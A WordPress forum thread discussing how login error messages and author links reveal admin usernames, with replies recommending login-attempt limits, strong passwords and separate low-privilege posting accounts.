1. Samvel Gevorgyan
    Posted 4 years ago #

    Hi everyone. Today I've tested some wordpress websites and found that there is a potentially dangerous mistake in users login system prior to version 3.1.

    Most of developers who install wordpress in their server, leave the default admin username called admin which is not so difficult to guess. And if you try to login using username admin with wrong password you get the system message "ERROR: The password you entered for the username admin is incorrect. Lost your password?". While trying to login using username administrator or any other wrong username with wrong password you get the system message "ERROR: Invalid username. Lost your password?".

    So, this is a potentially dangerous mistake in login system which allows an attacker to guess the username and that means 50% of the hacking attempt is done and the only thing he needs to do is to guess the password.

    [signature moderated as per forum rules]

  2. fonglh
    Posted 4 years ago #

    this seems to be by design, for better usability.


  3. Boyevul
    Posted 4 years ago #

    There is also the option to change the username from admin to something else when initially setting up the install.

  4. Samvel Gevorgyan
    Posted 4 years ago #

    yes, in wordpress you have such an option to change the default username. but on 90% websites that are based on wordpress, you can just simply open any topic/post created by the Administrator and see something like "posted by Administrator" or whoever he is.

  5. PlywoodMillionaire
    Posted 4 years ago #

    I agree with the original post. It became common to provide only ambiguous login failure errors over 5 years ago.

    In addition, the roadmap should include abandoning the "your password will be emailed" in place of the more common "please confirm your email" pattern...also circa 5-8 years ago. The current wp registration pattern requires copy and paste. I've watched users fumble over this countless times in usability testing. I've even seen users try to log in with their email address as the password because they don't understand how you can register without creating a password.

    The more of these patterns WP brings up to date, the more bloggers they'll alienate, unfortunately. So...it's up to plugins to solve all of these problems...which they do.

  6. Did you know that on 90% of unix servers, there's an account called root? That controls everything?

    This is not as much a security feature as you might think, the idea of changing admin to something else. Just because someone knows the ID doesn't make it more or less secure. I mean, my ID is Ipstenu. It's an admin ID. What makes my ID secure is my PASSWORD.

    I've never run into anyone who had a problem understanding that email confirmation might include getting a password emailed to them. That said, the verbage could stand an update.

  7. Samvel Gevorgyan
    Posted 4 years ago #

    there is no absolute protection in this world. and the only thing we all do is adding more and more security layers for malicious users to deny access to a particular resource. in other words we have gates, dogs inside the gates, doors, windows, locker on the doors, alert systems in the house and finally the safe. so if for me it's too hard to jump over the gate, there will be people for whom it is not so difficult to bypass all these security layers and open the safe
    I mean we make it time consuming for the malicious users to hack the system.
    So your username is as much important as your password. Because if I known your username I'll try to implement an brutforce attack to find your password. Otherwise it may take more than a month to try all the cases for usernames and passwords at the same time. which time consuming and while someone tries this, you probably will change the password.
    one thing I'll tell you about the *.nix machines. the same thing on those machines, you don't know what users are in etc/passwd file, otherwise you could take the name of the ftp user and try some of the thousand ftp bruteforcers in the web. but those usernames are in safe place and for security reasons it's recommended to change the default usernames.

  8. Wanna know how easy it is to sort out YOUR id on YOUR WP install? Click on the bloody 'author' link most people leave there. domain.com/author/USERNAME. Boom. I've got it.

    That's not going to make awhit of difference in the long run.

    Try this: http://wordpress.org/extend/plugins/limit-login-attempts/

  9. Boyevul
    Posted 4 years ago #

    I use Login Lockdown and I believe Theme My Login has some security features in it that limit login attempts. There are also stat browsers that you can implement that log IP addresses and what they were trying to do while visiting your site, allowing you to effectively blacklist by IP.

    Then again, nobody said you couldn't create an admin account, give it a 60 character password, and then post under a different account that only has limited functionality on the site itself.

    For every way there is to hack an account, there are 5 more ways to make that account more secure.

  10. Samvel Gevorgyan
    Posted 4 years ago #

    ..sure, guys, there are many many other ways to make it hard for an attacker to break into your system. and those are limitation of the login attempts or assigning minimum privileged for the default users, etc.

    ..you know, I like the way the login system works on wordpress.org. unlike other systems username and the password are important for this system at the same time. I mean, username is case sensitive and that's great. because in the blog posts this website may show the usernames in lower case, and only the owner of that profile will know whether his username is uSeRnaMe, USERNAME, username, etc. and this will add double protection to the system. and if you also add a limitation for the login attempts, etc. it becomes almost impossible to break an account.

Topic Closed

This topic has been closed to new replies.

About this Topic